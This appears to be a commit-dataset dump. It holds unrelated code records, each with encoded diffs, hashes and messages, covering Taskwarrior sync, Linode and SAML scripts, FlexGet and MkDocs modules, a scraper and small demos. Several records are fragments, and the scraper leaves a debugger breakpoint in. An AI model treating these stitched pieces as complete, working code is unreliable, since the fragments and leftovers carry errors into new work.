self.cache[key] if all([t.line_number not in self.cache.keys() for t in task.add_dependencies]): del self.cache[key] yield task def reset(self): self.cache = dict() cache = TaskCache() class VimwikiTask(object): def __init__(self, line, position): """ Constructs a Vimwiki task from line at given position at the buffer """ match = re.search(GENERIC_TASK, line) self.indent = match.group('space') self.text = match.group('text') self.uuid = match.group('uuid') # can be None for new tasks self.due = match.group('due') # TODO: convert to proper timestamp self.completed_mark = match.group('completed') self.completed = self.completed_mark is 'X' self.line_number = position # We need to track depedency set in a extra attribute, since # this may be a new task, and hence it need not to be saved yet. 
# We circumvent this problem by iteration order in the TaskCache self.add_dependencies = set() # First set the task attribute to None, then try to load it, if possible self.task = None if self.uuid: try: self.task = tw.tasks.get(uuid=self.uuid) except Task.DoesNotExist: self.task = Task(tw) else: self.task = Task(tw) self.parent = self.find_parent_task() # Make parent task dependant on this task if self.parent: self.parent.add_dependencies |= set([self]) def save_to_tw(self): # Push the values to the Task self.task['description'] = self.text self.task.save() # Load the UUID self.task.refresh() self.uuid = self.task['uuid'] vim.command('echom "uuid: %s"' % self.uuid) # Make parent task dependant on this task if self.parent: self.parent['depends'] = self.task['uuid'] # Mark task as done. This works fine with already completed tasks. if self.completed: self.task.done() def update_from_tw(self): if not self.task: return self.task.refresh() self.text = self.task['description'] # TODO: update due self.completed = (self.task['status'] == u'completed') def __str__(self): self.update_from_tw() return ''.join([ self.indent, '* [', 'X' if self.completed else self.completed_mark, '] ', self.text, ' #', self.uuid or 'TW-NOT_SYNCED' ]) def find_parent_task(self): for i in reversed(range(0, self.line_number)): if re.search(TASKS_TO_SAVE_TO_TW, vim.current.buffer[i]): task = VimwikiTask(line, i) if len(task.indent) < len(self.indent): return task def load_update_incomplete_tasks(): """ Updates all the incomplete tasks in the vimwiki file if the info from TW is different. """ for i in range(len(vim.current.buffer)): line = vim.current.buffer[i] if re.search(TASKS_TO_SAVE_TO_TW, line): task = VimwikiTask(line, i) task.save_to_tw() line = str(task) vim.current.buffer[i] = line number_of_lines = len(vim.current.buffer) vim.command('echom "lines: %d"' % number_of_lines) if __name__ == '__main__': load_update_incomplete_tasks()
Python
0.000031
@@ -3866,24 +3866,132 @@ the Task -%0A + only if the Vimwiki representation%0A # somehow differs%0A # TODO: Check more than description%0A if self.ta @@ -4008,16 +4008,17 @@ ption'%5D +! = self.t @@ -4020,17 +4020,214 @@ elf.text -%0A +:%0A self.task%5B'description'%5D = self.text%0A self.task%5B'depends'%5D %7C= set(s.task for s in self.add_dependencies%0A if not s.task.completed)%0A
466edb19fbf6fcfc51e671a80d45320bd8e1717c
add linode_api
linode_api/View_Network_Transfer.py
linode_api/View_Network_Transfer.py
Python
0.000037
@@ -0,0 +1,958 @@ +#!/usr/bin/env python3%0A# -*- coding: UTF-8 -*-%0A%0Aimport json%0Aimport math%0Aimport sys%0Afrom urllib import parse,request%0A %0A%0ALINODE_ID = ''%0ALINODE_TOKEN_RO = ''%0A %0A%0Adef getTransfer(linode_id, argv):%0A url = 'https://api.linode.com/v4/linode/instances/' + linode_id + '/transfer'%0A header_dict = %7B%0A 'User-Agent': 'User-Agent: curl/7.68.0',%0A 'Authorization': 'Bearer ' + LINODE_TOKEN_RO%7D%0A %0A req = request.Request(url, headers=header_dict)%0A res = request.urlopen(req)%0A ret = res.read()%0A %0A jsonData = json.loads(ret)%0A transfer_quota = float(round(jsonData%5B'quota'%5D, 2))%0A transfer_used = round(jsonData%5B'used'%5D / math.pow(1024, 3), 2)%0A %0A if argv == 'quota':%0A print(transfer_quota)%0A if argv == 'used':%0A print(transfer_used)%0A if argv == 'percent':%0A print(round(float(transfer_used / transfer_quota * 100), 1))%0A %0A%0Adef main():%0A getTransfer(LINODE_ID, sys.argv%5B1%5D)%0A %0A%0Aif __name__ == '__main__':%0A main()%0A
c84e3394ed4829ff9a66167864a11a4ef6a2b62c
Add script to get certificate expiration date
scripts/get_saml_cert_expiration.py
scripts/get_saml_cert_expiration.py
Python
0
@@ -0,0 +1,785 @@ +from cryptography import x509%0Afrom cryptography.hazmat.backends import default_backend%0A%0Afrom bluebottle.clients import properties%0Afrom bluebottle.clients.models import Client%0Afrom bluebottle.clients.utils import LocalTenant%0A%0A%0Adef run(*args):%0A for client in Client.objects.all():%0A with LocalTenant(client):%0A try:%0A cert_string = '-----BEGIN CERTIFICATE-----%5Cn%7B%7D%5Cn-----END CERTIFICATE-----'.format(%0A properties.TOKEN_AUTH%5B'sp'%5D%5B'x509cert'%5D%0A )%0A%0A cert = x509.load_pem_x509_certificate(bytes(cert_string), default_backend())%0A print client.name, cert.not_valid_after%0A except (AttributeError, KeyError):%0A pass%0A except Exception, e:%0A print e%0A
87d3a68e426650ca9cfd0b8d024eaf065d5934b5
Version 0.1.4
background_task/__init__.py
background_task/__init__.py
VERSION = (0, 1, 3) __version__ = '.'.join(map(str, VERSION)) def background(*arg, **kw): from tasks import tasks return tasks.background(*arg, **kw)
Python
0.000001
@@ -14,9 +14,9 @@ 1, -3 +4 )%0A__
3f685e3873c18e1eb28b7a4121c552bbb697e0a4
Add script for generating events.
scripts/generator.py
scripts/generator.py
Python
0
@@ -0,0 +1,1260 @@ +#!/usr/bin/python3%0A%0Afrom random import randint%0A%0Aoutput = %22%22%0Afilename = %22data%22%0A%0A%0Aclass Generator:%0A%0A def gen_date(self):%0A return str(randint(2013, 2015)) + %22-%22 %5C%0A + str(randint(1, 12)) + %22-%22 %5C%0A + str(randint(1, 31))%0A%0A def gen_price(self):%0A return str(10 * randint(10, 100))%0A%0A def gen_author(self):%0A users = %5B%0A %22Intey%22,%0A %22Andrey%22,%0A %22Tatiana%22,%0A %22Nigger%22,%0A %5D%0A return users%5Brandint(1, len(users)-1)%5D%0A%0A def gen_parts(self):%0A return str(randint(0, 15))%0A%0A def gen_row(self, s):%0A return %22:%22.join(%5Bs,%0A self.gen_price(),%0A self.gen_author(),%0A self.gen_date(),%0A self.gen_parts()%5D) + '%5Cn'%0A%0A%0Adef prepare_file(file_name):%0A gena = Generator()%0A with open(file_name, 'r') as f:%0A file_lines = %5B%5D%0A for x in f.readlines():%0A new_line = gena.gen_row(x.rstrip('%5Cn'))%0A # print(new_line)%0A file_lines.append(new_line)%0A%0A # file_lines.sort(key=lambda line: int(line.split(%22:%22)%5B-1%5D))%0A%0A with open(file_name, 'w') as f:%0A f.writelines(file_lines)%0A%0A%0Aif __name__ == %22__main__%22:%0A prepare_file(filename)%0A
8be49481990096c7a4735807cc3d9611b4ce0780
add migration script
scripts/update_metatable_columns.py
scripts/update_metatable_columns.py
Python
0.000001
@@ -0,0 +1,1241 @@ +from plenario.settings import DATABASE_CONN%0Afrom plenario.database import Base%0Afrom plenario.models import MetaTable%0Afrom sqlalchemy import create_engine, Table%0Afrom sqlalchemy.orm import sessionmaker%0Afrom sqlalchemy.exc import NoSuchTableError%0A%0A%0Adef main():%0A%0A # establish connection to provided database%0A engine = create_engine(DATABASE_CONN, convert_unicode=True)%0A session = sessionmaker(bind=engine)()%0A%0A # grab the MetaTable records%0A query = session.query(MetaTable)%0A%0A for table in query.all():%0A%0A try:%0A # reflect existing table information into a Table object%0A t = Table(table.dataset_name, Base.metadata, autoload=True, extend_existing=True)%0A print(table)%0A%0A cols = %7B%7D%0A%0A for col in t.columns:%0A c_name = str(col.name)%0A c_type = str(col.type)%0A%0A if c_name not in %7Bu'geom', u'point_date', u'hash'%7D:%0A cols%5Bc_name%5D = c_type%0A%0A # update existing table%0A table.column_names = cols%0A%0A session.commit()%0A%0A except NoSuchTableError:%0A pass%0A%0A print('... done.')%0A%0A%0Aif __name__ == '__main__':%0A%0A print %22Connecting to %7B%7D%22.format(DATABASE_CONN)%0A main()%0A
f5284cc7da9166a43e3cfbd901205f4446295f7a
Add Consumer Product Safety Commission.
inspectors/cpsc.py
inspectors/cpsc.py
Python
0
@@ -0,0 +1,1917 @@ +#!/usr/bin/env python%0A%0Aimport datetime%0Aimport logging%0Aimport os%0Afrom urllib.parse import urljoin%0A%0Afrom bs4 import BeautifulSoup%0Afrom utils import utils, inspector%0A%0A# https://www.cpsc.gov/en/about-cpsc/inspector-general/%0A# Oldest report: 2003%0A%0A# options:%0A# standard since/year options for a year range to fetch from.%0A#%0A# Notes for IG's web team:%0A# - Fix the links for BLACKLIST_REPORT_URLS%0A%0AREPORTS_URL = %22https://www.cpsc.gov/en/about-cpsc/inspector-general/%22%0A%0ABLACKLIST_REPORT_URLS = %5B%0A 'https://www.cpsc.gov/Media/Documents/About/OIG/Audits/CPSC-Fiscal-Year-2009-Financial-Statements-released-November-13-2009/',%0A%5D%0A%0Adef run(options):%0A year_range = inspector.year_range(options)%0A%0A doc = BeautifulSoup(utils.download(REPORTS_URL))%0A results = doc.select(%22ul.summary-list li%22)%0A for result in results:%0A report = report_from(result, year_range)%0A if report:%0A inspector.save_report(report)%0A%0Adef report_from(result, year_range):%0A link = result.find(%22a%22)%0A report_url = urljoin(REPORTS_URL, link.get('href'))%0A if report_url in BLACKLIST_REPORT_URLS:%0A return%0A report_filename = report_url.split(%22/%22)%5B-1%5D%0A report_id, _ = os.path.splitext(report_filename)%0A if not report_id:%0A import pdb;pdb.set_trace()%0A%0A title = link.text%0A published_on_text = result.select(%22span.date%22)%5B0%5D.text%0A published_on = datetime.datetime.strptime(published_on_text, '%25B %25d, %25Y')%0A%0A if published_on.year not in year_range:%0A logging.debug(%22%5B%25s%5D Skipping, not in requested range.%22 %25 report_url)%0A return%0A%0A report = %7B%0A 'inspector': 'cpsc',%0A 'inspector_url': 'https://www.cpsc.gov/en/about-cpsc/inspector-general/',%0A 'agency': 'cpsc',%0A 'agency_name': 'Consumer Product Safety Commission',%0A 'report_id': report_id,%0A 'url': report_url,%0A 'title': title,%0A 'published_on': datetime.datetime.strftime(published_on, %22%25Y-%25m-%25d%22),%0A %7D%0A return report%0A%0Autils.run(run) if (__name__ == %22__main__%22) else None%0A
79a81b2d1936cd44caabf5f4e38abdee88a8821a
add missing proxy for kiva.agg.plat_support
enthought/kiva/agg/plat_support.py
enthought/kiva/agg/plat_support.py
Python
0
@@ -0,0 +1,51 @@ +# proxy module%0Afrom kiva.agg.plat_support import *%0A
f25a1484892d7b60fb9ffaba033cfb467e1b34f5
Update random-point-in-non-overlapping-rectangles.py
Python/random-point-in-non-overlapping-rectangles.py
Python/random-point-in-non-overlapping-rectangles.py
# Time: O(logn) # Space: O(n) # Given a list of non-overlapping axis-aligned rectangles rects, # write a function pick which randomly and uniformily picks # an integer point in the space covered by the rectangles. # # Note: # - An integer point is a point that has integer coordinates. # - A point on the perimeter of a rectangle is included in the space covered by the rectangles. # - ith rectangle = rects[i] = [x1,y1,x2,y2], # where [x1, y1] are the integer coordinates of the bottom-left corner, # and [x2, y2] are the integer coordinates of the top-right corner. # - length and width of each rectangle does not exceed 2000. # - 1 <= rects.length <= 100 # - pick return a point as an array of integer coordinates [p_x, p_y] # - pick is called at most 10000 times. # # Example 1: # # Input: # ["Solution","pick","pick","pick"] # [[[[1,1,5,5]]],[],[],[]] # Output: # [null,[4,1],[4,1],[3,3]] # Example 2: # # Input: # ["Solution","pick","pick","pick","pick","pick"] # [[[[-2,-2,-1,-1],[1,0,3,0]]],[],[],[],[],[]] # Output: # [null,[-1,-2],[2,0],[-2,-1],[3,0],[-2,-2]] # Explanation of Input Syntax: # # The input is two lists: the subroutines called and their arguments. # Solution's constructor has one argument, # the array of rectangles rects. pick has no arguments. # Arguments are always wrapped with a list, even if there aren't any. import random import bisect class Solution(object): def __init__(self, rects): """ :type rects: List[List[int]] """ self.__rects = list(rects) self.__prefix_sum = map(lambda x : (x[2]-x[0]+1)*(x[3]-x[1]+1), rects) for i in xrange(1, len(self.__prefix_sum)): self.__prefix_sum[i] += self.__prefix_sum[i-1] def pick(self): """ :rtype: List[int] """ target = random.randint(0, self.__prefix_sum[-1]-1) left = bisect.bisect_right(self.__prefix_sum, target) rect = self.__rects[left] width = rect[2]-rect[0]+1 height = rect[3]-rect[1]+1 base = self.__prefix_sum[left]-width*height return [rect[0]+(target-base)%width, rect[1]+(target-base)//width] # Your Solution object will be instantiated and called as such: # obj = Solution(rects) # param_1 = obj.pick()
Python
0.000007
@@ -1,16 +1,42 @@ # Time: + ctor: O(n)%0A# pick: O(logn)
eb8eabd44764dc26fdbd08ef35b3ea8fc0dd7c54
Add mutt display script
bin/mutt-display.py
bin/mutt-display.py
Python
0
@@ -0,0 +1,862 @@ +#!/usr/bin/env python2%0A%22%22%22%0A Copyright 2011 by Brian C. Lane%0A%22%22%22%0Aimport sys%0Aimport email%0A%0Araw_msg = sys.stdin.read()%0Amsg = email.message_from_string(raw_msg)%0Adate = msg.get('Date', None)%0Aif date:%0A from email.utils import mktime_tz, parsedate_tz, formatdate%0A%0A try:%0A # Convert to local TZ%0A tz_tuple = parsedate_tz(date)%0A epoch_time = mktime_tz(tz_tuple)%0A msg.add_header('X-Date', formatdate( epoch_time, localtime=True ))%0A%0A from cStringIO import StringIO%0A from email.generator import Generator%0A fp = StringIO()%0A g = Generator(fp, mangle_from_=False, maxheaderlen=200)%0A g.flatten(msg)%0A sys.stdout.write(fp.getvalue())%0A except:%0A import traceback%0A print(traceback.format_exc())%0A sys.stdout.write(raw_msg)%0Aelse:%0A # just write it out%0A sys.stdout.write(raw_msg)%0A
7e8584f9ed3285f16954bc515ecd154c41c5cf08
Update --movie-queue clear to work with last change.
flexget/plugins/cli/movie_queue.py
flexget/plugins/cli/movie_queue.py
import logging from optparse import OptionValueError from sqlalchemy.exc import OperationalError from flexget.utils import qualities from flexget.utils.tools import console, str_to_boolean from flexget.plugin import DependencyError, register_plugin, register_parser_option try: from flexget.plugins.filter.movie_queue import QueueError, queue_add, queue_del, queue_get, parse_what except ImportError: raise DependencyError(issued_by='cli_movie_queue', missing='movie_queue') log = logging.getLogger('cli_movie_queue') USAGE = '(add|del|list|downloaded) [NAME|IMDB_ID|tmdb_id=TMDB_ID] [QUALITY] [FORCE]' class MovieQueueManager(object): """ Handle IMDb queue management; add, delete and list """ @staticmethod def optik_movie_queue(option, opt, value, parser): """Callback for Optik, parses --movie-queue options and populates movie_queue options value""" options = {} usage_error = OptionValueError('Usage: ' + USAGE) if not parser.rargs: raise usage_error options['action'] = parser.rargs[0].lower() if options['action'] not in ('add', 'del', 'list', 'downloaded', 'clear'): raise usage_error if len(parser.rargs) == 1: if options['action'] not in ('list', 'downloaded', 'clear'): raise usage_error # 2, args is the minimum allowed (operation + item) for actions other than list if len(parser.rargs) >= 2: options['what'] = parser.rargs[1] # 3, quality if len(parser.rargs) >= 3: options['quality'] = parser.rargs[2] else: options['quality'] = 'ANY' # TODO: Get default from config somehow? # why not use the quality user has queued most, ie option called 'auto' ? # and if none is queued default to something good like '720p bluray' # 4, force download if len(parser.rargs) >= 4: options['force'] = str_to_boolean(parser.rargs[3]) else: options['force'] = True parser.values.movie_queue = options def on_process_start(self, feed): """Handle --movie-queue management""" if not getattr(feed.manager.options, 'movie_queue', False): return feed.manager.disable_feeds() options = feed.manager.options.movie_queue if options['action'] == 'list': self.queue_list(feed.session) return if options['action'] == 'downloaded': self.queue_list(feed.session, downloaded=True) return if options['action'] == 'clear': self.clear(feed.session) return if options['action'] == 'del': try: title = queue_del(options['what']) except QueueError, e: console(e.message) else: console('Removed %s from queue' % title) return # Adding to queue requires a lookup for missing information try: what = parse_what(options['what']) options.update(what) except QueueError, e: console(e.message) if not options.get('title') or not (options.get('imdb_id') or options.get('tmdb_id')): console('could not determine movie') # TODO: Rethink errors return try: if options['action'] == 'add': try: added = queue_add(title=options['title'], imdb_id=options['imdb_id'], tmdb_id=options['tmdb_id'], quality=options['quality'], force=options['force']) # warn about a bit silly quality value if qualities.common_name(options['quality']) == '720p': console('WARNING: quality 720p in movie context will not retrieve BluRay rips. 
You might want to use "720p bluray" instead!') except QueueError, e: console(e.message) if e.errno == 1: # This is an invalid quality error, display some more info console('Recognized qualities are %s' % ', '.join([qual.name for qual in qualities.all()])) console('ANY is the default and can also be used explicitly to specify that quality should be ignored.') else: console('Added %s to queue with quality %s' % (added['title'], added['quality'])) except OperationalError: log.critical('OperationalError') def queue_list(self, session, downloaded=False): """List IMDb queue""" items = queue_get(session=session, downloaded=downloaded) console('-' * 79) console('%-10s %-7s %-37s %-15s %s' % ('IMDB id', 'TMDB id', 'Title', 'Quality', 'Force')) console('-' * 79) for item in items: console('%-10s %-7s %-37s %-15s %s' % (item.imdb_id, item.tmdb_id, item.title, item.quality, item.immortal)) if not items: console('No results') console('-' * 79) def clear(self, session): """Delete movie queue""" items = queue_get(session=session, downloaded=False) console('Removing the following movies from movie queue:') console('-' * 79) for item in items: console(item.title) queue_del(imdb_id=item.imdb_id) if not items: console('No results') console('-' * 79) register_plugin(MovieQueueManager, 'movie_queue_manager', builtin=True) register_parser_option('--movie-queue', action='callback', callback=MovieQueueManager.optik_movie_queue, help=USAGE)
Python
0.000012
@@ -569,16 +569,22 @@ wnloaded +%7Cclear ) %5BNAME%7C @@ -5560,24 +5560,16 @@ eue_del( -imdb_id= item.imd
2957a0331654a22c6f62544b6ec1ca4a4ee86be9
Tweak metainfo_series series name detection.
flexget/plugins/metainfo_series.py
flexget/plugins/metainfo_series.py
import logging from flexget.plugin import * from flexget.utils.titles import SeriesParser import re log = logging.getLogger('metanfo_series') class MetainfoSeries(object): """ Check if entry appears to be a series, and populate series info if so. """ def validator(self): from flexget import validator return validator.factory('boolean') def on_feed_metainfo(self, feed): # Don't run if we are disabled if not feed.config.get('metainfo_series', True): return for entry in feed.entries: match = self.guess_series(entry['title']) if match: entry['series_name'] = match[0] entry['series_season'] = match[1] entry['series_episode'] = match[2] entry['series_parser'] = match[3] entry['series_guessed'] = True def guess_series(self, title): """Returns tuple of (series_name, season, episode, parser) if found, else None""" # Clean the data for parsing parser = SeriesParser() data = parser.clean(title) data = parser.remove_dirt(data) data = ' '.join(data.split()) match = parser.parse_episode(data) if match: if match[0] is None: return elif match[2].start() > 1: # If an episode id is found, assume everything before it is series name name = data[:match[2].start()].rstrip() # Grab the name from the original title to preserve formatting name = title[:len(name)] # Replace . and _ with spaces name = re.sub('[\._]', ' ', name) season = match[0] episode = match[1] parser.name = name parser.data = title parser.season = season parser.episode = episode parser.valid = True return (name, season, episode, parser) register_plugin(MetainfoSeries, 'metainfo_series', builtin=True)
Python
0.000012
@@ -1165,46 +1165,8 @@ ta)%0A - data = ' '.join(data.split())%0A @@ -1686,16 +1686,62 @@ , name)%0A + name = ' '.join(name.split())%0A
622405bd6a9b9d175fbd8a2e93d6cfadb7d7940b
Fix typo.
mkdocs/cli.py
mkdocs/cli.py
#!/usr/bin/env python # coding: utf-8 from __future__ import unicode_literals import logging import click import socket from mkdocs import __version__ from mkdocs import build from mkdocs import gh_deploy from mkdocs import new from mkdocs import serve from mkdocs import utils from mkdocs import exceptions from mkdocs.config import load_config log = logging.getLogger(__name__) class State(object): ''' Maintain logging level.''' def __init__(self, log_name='mkdocs', level=logging.INFO): self.logger = logging.getLogger(log_name) self.logger.propagate = False stream = logging.StreamHandler() formatter = logging.Formatter("%(levelname)-7s - %(message)s ") stream.setFormatter(formatter) self.logger.addHandler(stream) self.logger.setLevel(level) pass_state = click.make_pass_decorator(State, ensure=True) def verbose_option(f): def callback(ctx, param, value): state = ctx.ensure_object(State) if value: state.logger.setLevel(logging.DEBUG) return click.option('-v', '--verbose', is_flag=True, expose_value=False, help='Enable verbose output', callback=callback)(f) def quiet_option(f): def callback(ctx, param, value): state = ctx.ensure_object(State) if value: state.logger.setLevel(logging.ERROR) return click.option('-q', '--quiet', is_flag=True, expose_value=False, help='Silence warnings', callback=callback)(f) def common_options(f): f = verbose_option(f) f = quiet_option(f) return f clean_help = "Remove old files from the site_dir before building" config_file_help = "Provide a specific MkDocs config" dev_addr_help = ("IP address and port to serve documentation locally (default: " "localhost:8000)") strict_help = ("Enable strict mode. This will cause MkDocs to abort the build " "on any warnings.") theme_help = "The theme to use when building your documentation." theme_choices = utils.get_theme_names() site_dir_help = "The directory to output the result of the documentation build." reload_help = "Enable and disable the live reloading in the development server." commit_message_help = ("A commit message to use when commiting to the " "Github Pages remote branch") remote_branch_help = ("The remote branch to commit to for Github Pages. This " "overrides the value specified in config") @click.group(context_settings={'help_option_names': ['-h', '--help']}) @click.version_option(__version__, '-V', '--version') @common_options def cli(): """ MkDocs - Project documentation with Markdown. 
""" @cli.command(name="serve") @click.option('-f', '--config-file', type=click.File('rb'), help=config_file_help) @click.option('-a', '--dev-addr', help=dev_addr_help, metavar='<IP:PORT>') @click.option('-s', '--strict', is_flag=True, help=strict_help) @click.option('-t', '--theme', type=click.Choice(theme_choices), help=theme_help) @click.option('--livereload/--no-livereload', default=True, help=reload_help) @common_options def serve_command(dev_addr, config_file, strict, theme, livereload): """Run the builtin development server""" logging.getLogger('tornado').setLevel(logging.WARNING) try: serve.serve( config_file=config_file, dev_addr=dev_addr, strict=strict, theme=theme, livereload=livereload, ) except (exceptions.ConfigurationError, socket.error) as e: # Avoid ugly, unhelpful traceback raise SystemExit('\n' + str(e)) @cli.command(name="build") @click.option('-c', '--clean', is_flag=True, help=clean_help) @click.option('-f', '--config-file', type=click.File('rb'), help=config_file_help) @click.option('-s', '--strict', is_flag=True, help=strict_help) @click.option('-t', '--theme', type=click.Choice(theme_choices), help=theme_help) @click.option('-d', '--site-dir', type=click.Path(), help=site_dir_help) @common_options def build_command(clean, config_file, strict, theme, site_dir): """Build the MkDocs documentation""" try: build.build(load_config( config_file=config_file, strict=strict, theme=theme, site_dir=site_dir ), clean_site_dir=clean) except exceptions.ConfigurationError as e: # Avoid ugly, unhelpful traceback raise SystemExit('\n' + str(e)) @cli.command(name="json") @click.option('-c', '--clean', is_flag=True, help=clean_help) @click.option('-f', '--config-file', type=click.File('rb'), help=config_file_help) @click.option('-s', '--strict', is_flag=True, help=strict_help) @click.option('-d', '--site-dir', type=click.Path(), help=site_dir_help) @common_options def json_command(clean, config_file, strict, site_dir): """Build the MkDocs documentation to JSON files Rather than building your documentation to HTML pages, this outputs each page in a simple JSON format. This command is useful if you want to index your documentation in an external search engine. """ log.warning("The json command is deprcated and will be removed in a future " "MkDocs release. 
For details on updating: " "http://www.mkdocs.org/about/release-notes/") try: build.build(load_config( config_file=config_file, strict=strict, site_dir=site_dir ), dump_json=True, clean_site_dir=clean) except exceptions.ConfigurationError as e: # Avoid ugly, unhelpful traceback raise SystemExit('\n' + str(e)) @cli.command(name="gh-deploy") @click.option('-c', '--clean', is_flag=True, help=clean_help) @click.option('-f', '--config-file', type=click.File('rb'), help=config_file_help) @click.option('-m', '--message', help=commit_message_help) @click.option('-b', '--remote-branch', help=remote_branch_help) @click.option('-r', '--remote-name', help=remote_branch_help) @common_options def gh_deploy_command(config_file, clean, message, remote_branch, remote_name): """Deploy your documentation to GitHub Pages""" try: config = load_config( config_file=config_file, remote_branch=remote_branch, remote_name=remote_name ) build.build(config, clean_site_dir=clean) gh_deploy.gh_deploy(config, message=message) except exceptions.ConfigurationError as e: # Avoid ugly, unhelpful traceback raise SystemExit('\n' + str(e)) @cli.command(name="new") @click.argument("project_directory") @common_options def new_command(project_directory): """Create a new MkDocs project""" new.new(project_directory)
Python
0.000001
@@ -5332,16 +5332,17 @@ is depr +e cated an
00cc43b3e7a848c17272928f6469beb128e278b4
add linear_regression
projects/NLR_MEG/linear_regression.py
projects/NLR_MEG/linear_regression.py
Python
0.999885
@@ -0,0 +1,809 @@ +#!/usr/bin/env python2%0A# -*- coding: utf-8 -*-%0A%22%22%22%0ACreated on Tue Jun 26 12:08:31 2018%0A%0A@author: sjjoo%0A%22%22%22%0A#%25%25%0Aimport numpy as np%0Afrom sklearn import linear_model as lm%0Aimport statsmodels.api as sm%0A%0Aimport statsmodels.formula.api as smf%0Aimport pandas as pd%0A%0AX = np.column_stack((temp_read,temp_raw, temp_age,temp_meg1, temp_meg2))%0Ay = temp_meg2%0A%0Areg = lm.LinearRegression()%0Areg.fit(X,y)%0A%0A%0Ad = pd.DataFrame(X,columns=%5B'read', 'raw', 'age','meg_dot', 'meg_lex'%5D)%0Aresult1 = smf.ols('meg_dot~read',d).fit()%0Aresult2 = smf.ols('meg_dot~age',d).fit()%0A%0Aresult3 = smf.ols('meg_dot~read+age',d).fit()%0Aprint(result1.summary())%0Aprint(result2.summary())%0Aprint(result3.summary())%0A%0Aresult4 = smf.ols('meg_dot~meg_lex',d).fit()%0A%0Aprint(result4.summary())%0A%0Aresult5 = smf.ols('meg_dot~raw+age',d).fit()%0A%0Aprint(result5.summary())
f20aef828bb7e3a7206cd239ff95c3234391c11c
Add Example 5.1.
Kane1985/Chapter5/Example5.1.py
Kane1985/Chapter5/Example5.1.py
Python
0
@@ -0,0 +1,2087 @@ +#!/usr/bin/env python%0A# -*- coding: utf-8 -*-%0A%22%22%22Example 5.1 from Kane 1985.%22%22%22%0A%0Afrom __future__ import division%0Afrom sympy import Dummy, Matrix%0Afrom sympy import expand, solve, symbols, trigsimp%0Afrom sympy.physics.mechanics import ReferenceFrame, Point, dot, dynamicsymbols%0Afrom util import msprint, subs, partial_velocities%0Afrom util import generalized_active_forces, potential_energy%0A%0A%0Ag, m1, m2, k, L, omega, t = symbols('g m1 m2 k L %CF%89 t')%0Aq1, q2, q3 = dynamicsymbols('q1:4')%0Aqd1, qd2, qd3 = dynamicsymbols('q1:4', level=1)%0Au1, u2, u3 = dynamicsymbols('u1:4')%0A%0A## --- Define ReferenceFrames ---%0AA = ReferenceFrame('A')%0AB = A.orientnew('B', 'Axis', %5Bomega * t, A.y%5D)%0AE = B.orientnew('E', 'Axis', %5Bq3, B.z%5D)%0A%0A## --- Define Points and their velocities ---%0ApO = Point('O')%0ApO.set_vel(A, 0)%0A%0ApP1 = pO.locatenew('P1', q1*B.x + q2*B.y)%0ApD_star = pP1.locatenew('D*', L*E.x)%0A%0ApP1.set_vel(B, pP1.pos_from(pO).dt(B))%0ApD_star.v2pt_theory(pP1, B, E)%0A%0ApP1.v1pt_theory(pO, A, B)%0ApD_star.v2pt_theory(pP1, A, E)%0A%0A## --- Expressions for generalized speeds u1, u2, u3 ---%0Akde = %5Bu1 - dot(pP1.vel(A), E.x), u2 - dot(pP1.vel(A), E.y),%0A u3 - dot(E.ang_vel_in(B), E.z)%5D%0Akde_map = solve(kde, %5Bqd1, qd2, qd3%5D)%0A%0A## --- Velocity constraints ---%0Avc = %5Bdot(pD_star.vel(B), E.y)%5D%0Avc_map = solve(subs(vc, kde_map), %5Bu3%5D)%0A%0A## --- Define forces on each point in the system ---%0AK = k*E.x - k/L*dot(pP1.pos_from(pO), E.y)*E.y%0Agravity = lambda m: -m*g*A.y%0Aforces = %5B(pP1, K), (pP1, gravity(m1)), (pD_star, gravity(m2))%5D%0A%0A## --- Calculate generalized active forces ---%0Apartials = partial_velocities(zip(*forces)%5B0%5D, %5Bu1, u2%5D, A,%0A kde_map, vc_map)%0AFr_tilde, _ = generalized_active_forces(partials, forces)%0AFr_tilde = map(expand, map(trigsimp, Fr_tilde))%0A%0Aprint('Finding a potential energy function V.')%0AV = potential_energy(Fr_tilde, %5Bq1, q2, q3%5D, %5Bu1, u2%5D, kde_map, vc_map)%0Aif V is not None:%0A print('V = %7B0%7D'.format(msprint(V)))%0A print('Substituting %CE%B1i = 0, C = 0...')%0A zero_vars = dict(zip(symbols('C %CE%B11:4'), %5B0%5D * 4))%0A print('V = %7B0%7D'.format(msprint(V.subs(zero_vars))))%0A
bc691d415d32836f8354582294c6ae11413b0a6a
change version to .dev
flexget/_version.py
flexget/_version.py
""" Current FlexGet version. This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by release scripts in continuous integration. Should (almost) never be set manually. The version should always be set to the <next release version>.dev The jenkins release job will automatically strip the .dev for release, and update the version again for continued development. """ __version__ = '2.0.0'
Python
0.000001
@@ -438,10 +438,14 @@ = '2.0.0 +.dev '%0A
9012cb2aa34d6df32e780555b74581b29cd309b8
add forgotten new module
flexx/ui/_iframe.py
flexx/ui/_iframe.py
Python
0
@@ -0,0 +1,800 @@ +from .. import react%0Afrom . import Widget%0A%0A %0Aclass IFrame(Widget):%0A %22%22%22 An iframe element, i.e. a container to show web-content. Note%0A that some websites do not allow themselves to be rendered in a%0A cross-source iframe.%0A %22%22%22%0A %0A CSS = '.flx-iframe %7Bborder: none;%7D'%0A %0A @react.input%0A def url(v=''):%0A %22%22%22 The url to show. 'http://' is automatically prepended if the url%0A does not have '://' in it.%0A %22%22%22%0A v = str(v)%0A if v and not '://' in v:%0A v = 'http://' + v%0A return v%0A %0A class JS:%0A %0A def _create_node(self):%0A self.node = document.createElement('iframe')%0A %0A @react.connect('url')%0A def _update_url(self, url):%0A print('set', url)%0A self.node.src = url%0A
76c7add3a57810d42e6584ddf22acc027f641a0a
Create classes.py
classes.py
classes.py
Python
0.000001
@@ -0,0 +1,551 @@ +from tkinter import *%0A%0Aclass myClass:%0A%0A def hello(self):%0A self.label.config(text='HelloO!')%0A%0A def __init__(self,master): # this function is always called when object is instantiated%0A frame=Frame(master)%0A frame.pack()%0A%0A self.printBtn = Button(frame, text='click', command=self.hello)%0A self.printBtn.pack()%0A self.quitBtn = Button(frame, text='quit', command=frame.quit)%0A self.quitBtn.pack()%0A self.label = Label(frame)%0A self.label.pack()%0A%0A%0Aroot= Tk()%0Ac= myClass(root)%0A%0Aroot.mainloop()%0A
2ccefe090305e815633f92a6f3d13155e46e7711
Update migrations
app/timetables/migrations/0002_auto_20171005_2209.py
app/timetables/migrations/0002_auto_20171005_2209.py
Python
0.000001
